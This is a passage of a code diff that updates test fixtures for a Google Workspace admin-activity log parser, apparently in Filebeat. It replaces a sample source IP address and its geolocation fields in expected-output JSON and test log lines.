+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -627,26 +583,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5406,
+        "log.offset": 5395,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -667,7 +619,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -679,26 +631,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5792,
+        "log.offset": 5780,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -719,7 +667,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -733,26 +681,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6178,
+        "log.offset": 6165,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -774,7 +718,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -789,26 +733,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6634,
+        "log.offset": 6620,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -830,7 +770,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -845,26 +785,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7135,
+        "log.offset": 7120,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -885,7 +821,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -902,26 +838,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7635,
+        "log.offset": 7619,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -942,7 +874,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -957,26 +889,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8124,
+        "log.offset": 8107,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -997,7 +925,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -1009,26 +937,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8657,
+        "log.offset": 8639,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1049,7 +973,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1062,26 +986,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9047,
+        "log.offset": 9028,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1103,7 +1023,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1119,26 +1039,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9465,
+        "log.offset": 9445,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log
index 5aececc68aac..40ae2ee7166a 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log
@@ -1 +1 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json
index 50adf8044be5..53e72d481039 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json
@@ -9,7 +9,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -28,23 +28,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
